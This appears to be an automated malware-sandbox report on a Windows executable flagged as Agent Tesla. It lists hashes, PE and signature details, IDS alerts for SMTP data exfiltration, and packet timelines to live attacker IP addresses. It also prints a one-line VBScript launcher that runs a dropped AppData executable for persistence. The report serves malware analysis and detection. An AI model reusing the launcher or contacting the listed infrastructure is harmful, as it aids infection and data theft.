                                                                                  MD5:75347042FAF5747C5D43C6EEFB5A0EDE
                                                                                  SHA1:634DE057D532E9415BC2725E8DDAD3EB52A89A52
                                                                                  SHA-256:34768B3DE4D449EAB177EB76AB2C1758BC7CAECCAC5D3B2D0DC9633656864A51
                                                                                  SHA-512:68BCE78465D6CC30F8BB6761B2198AD3F047C5918DBE80489269C1E62F83D28B06CB8A33B35D7C89D207F6FCF7133ED9F7CE1A4B23413C6FEB2255352EC15206
                                                                                  Malicious:true
                                                                                  Reputation:low
                                                                                  Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\vdvfyt.exe"""
                                                                                  Process:C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):348128
                                                                                  Entropy (8bit):5.691852920088672
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:BbS0IEhKUQfHCj32o7wewfHHQoz5f8o/8Ck0cTIHXrrCbJSZ862M:9SYIWtw4W8y8cc03rObgSM
                                                                                  MD5:A31BCF203BB60F13DE83211AC9D44D06
                                                                                  SHA1:8D559C68B94F38E6886F467080CBCE53A2AE1654
                                                                                  SHA-256:BD35A1C3B410026617E27FA3937F77F1A42ADA6978AFC36022E75C63677F897D
                                                                                  SHA-512:6404465CCF7DCBC3BCD985E68034F5C8CBC926DB719397D05B3AF50F9E5554CB1757080038EA7D26B451AED8C90F7D83894C1984995FFF6F87BC077AD56A3B50
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                                                  Reputation:low
                                                                                  Process:C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):5.691852920088672
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Ref#1550238.exe
                                                                                  File size:348'128 bytes
                                                                                  MD5:a31bcf203bb60f13de83211ac9d44d06
                                                                                  SHA1:8d559c68b94f38e6886f467080cbce53a2ae1654
                                                                                  SHA256:bd35a1c3b410026617e27fa3937f77f1a42ada6978afc36022e75c63677f897d
                                                                                  SHA512:6404465ccf7dcbc3bcd985e68034f5c8cbc926db719397d05b3af50f9e5554cb1757080038ea7d26b451aed8c90f7d83894c1984995fff6f87bc077ad56a3b50
                                                                                  SSDEEP:3072:BbS0IEhKUQfHCj32o7wewfHHQoz5f8o/8Ck0cTIHXrrCbJSZ862M:9SYIWtw4W8y8cc03rObgSM
                                                                                  TLSH:F174840BF7C1D4D6DD407BB2F4974911A3A0EDC23A9FCE06295633D82D733A7698618A
                                                                                  Icon Hash:b04a484c4c4a4eb0
                                                                                  Entrypoint:0x443dee
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x674E2DDC [Mon Dec 2 21:59:56 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Signature Valid:false
                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                  Error Number:-2146869232
                                                                                  Not Before:04/07/2024 00:35:32
                                                                                  Not After:15/05/2027 11:15:04
                                                                                  Subject Chain
                                                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                                                  Version:3
                                                                                  Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                                                  Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                                                                  Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                                                                  Serial:6DD2E3173995F51BFAC1D9FB4CB200C1
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x43da0 | 0x4b | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0x10e28 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x53200 | 0x1de0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x56000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x41df4 | 0x41e00 | 102d06c84424e63954a39ec2819e6137 | False | 0.3905175225332068 | data | 5.67905571766169 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x44000 | 0x10e28 | 0x11000 | f610e0855d271b56b7174997eb33bf0b | False | 0.055893841911764705 | data | 4.109331107170668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x56000 | 0xc | 0x200 | f840735ffb5cd866dbd5b914a57abacd | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x44130 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.046492369572932686 |
| RT_GROUP_ICON | 0x54958 | 0x14 | data | | | 1.15 |
| RT_VERSION | 0x5496c | 0x308 | data | | | 0.4497422680412371 |
| RT_MANIFEST | 0x54c74 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-03T15:16:09.896860+0100 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.8 | 49713 | 162.254.34.31 | 587 | TCP |
| 2024-12-03T15:16:09.896860+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49713 | 162.254.34.31 | 587 | TCP |
| 2024-12-03T15:16:46.430602+0100 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.8 | 49720 | 162.254.34.31 | 587 | TCP |
| 2024-12-03T15:16:46.430602+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49720 | 162.254.34.31 | 587 | TCP |
| 2024-12-03T15:17:46.883614+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.8 | 49713 | 162.254.34.31 | 587 | TCP |
| 2024-12-03T15:17:46.883614+0100 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.8 | 49713 | 162.254.34.31 | 587 | TCP |
| 2024-12-03T15:18:23.121832+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.8 | 49720 | 162.254.34.31 | 587 | TCP |
| 2024-12-03T15:18:23.121832+0100 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.8 | 49720 | 162.254.34.31 | 587 | TCP |

                                                                                  Dec 3, 2024 15:15:47.806212902 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.807616949 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.807672024 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.809051991 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.809114933 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.810538054 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.810590982 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.811261892 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.811331987 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.812758923 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.812829018 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.954488993 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.954585075 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.975275040 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.975374937 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.978795052 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.978877068 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.981777906 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.981851101 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.985404968 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.985461950 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.989783049 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.989896059 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.996349096 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.996437073 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.998533964 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.998627901 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.000693083 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.000775099 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.002222061 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.002304077 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.003065109 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.003132105 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.004359961 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.004441023 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.005096912 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.005156040 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.006537914 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.006616116 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.007337093 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.007409096 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.007419109 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.007461071 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.207411051 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.207499981 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.209085941 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.209142923 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.211143970 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.211205006 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.212297916 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.212364912 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.214241028 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.214304924 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.216236115 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.216336966 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.217396021 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.217454910 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.219266891 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.219357014 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.221338034 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.221401930 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.222522020 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.222573996 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.223335028 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.274673939 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.292891026 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.292987108 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.294089079 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.294274092 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.296138048 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.296188116 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.297327995 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.297374964 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.299385071 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.299442053 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.301286936 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.301337957 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.302400112 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.302463055 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.304451942 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.304507017 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.306325912 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.306387901 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.307503939 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.307559967 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.309545040 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.309607029 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.311414003 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.311477900 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.314038992 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.314095020 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.318491936 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.318563938 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.319777012 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.319832087 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.320533037 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.320583105 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.320590019 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.368249893 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.499978065 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.500093937 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.501322031 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.501388073 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.502602100 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.502677917 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.704535007 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.704621077 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.704822063 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.704870939 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.707031965 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.707158089 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.708540916 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.708609104 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.709187984 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.709261894 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.710727930 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.710788012 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.711568117 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.711636066 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.712239981 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.712294102 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.712944031 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.713000059 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.714991093 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.715053082 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.716659069 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.716711044 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.718038082 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.718110085 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.719949007 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.720009089 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.720571995 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.720626116 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.725078106 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.725138903 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.725259066 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.725315094 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.725845098 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.774574041 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.907249928 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.907341957 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.909141064 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.909198999 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.910634041 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.910696030 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.913845062 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.913919926 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.915364027 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.915438890 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.916551113 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.916600943 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.918415070 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.918478012 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.098562956 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.098711967 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.098731041 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.098779917 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.146636009 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.146802902 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.148040056 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.148127079 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.148839951 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.148901939 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.149404049 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.149492025 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.150162935 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.150221109 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.151721954 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.151788950 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.153232098 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.153333902 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.153729916 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.153786898 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.412461042 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.412580013 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.414129972 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.414194107 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.416151047 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.416205883 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.418116093 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.418174028 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.419215918 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.419286966 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.421214104 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:49.421277046 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:49.422442913 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:17.743333101 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:17.834506035 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:17.879336119 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:18.839209080 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:18.839231968 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:18.839405060 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:18.839420080 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:18.839472055 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:18.846945047 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:18.847016096 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:18.857023001 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:18.857101917 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:19.024156094 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:19.024323940 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:19.040074110 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:19.040200949 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:19.051805019 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:19.051909924 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:19.067528963 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:19.067637920 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:19.075822115 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:19.075898886 CET49714443192.168.2.8194.15.112.248
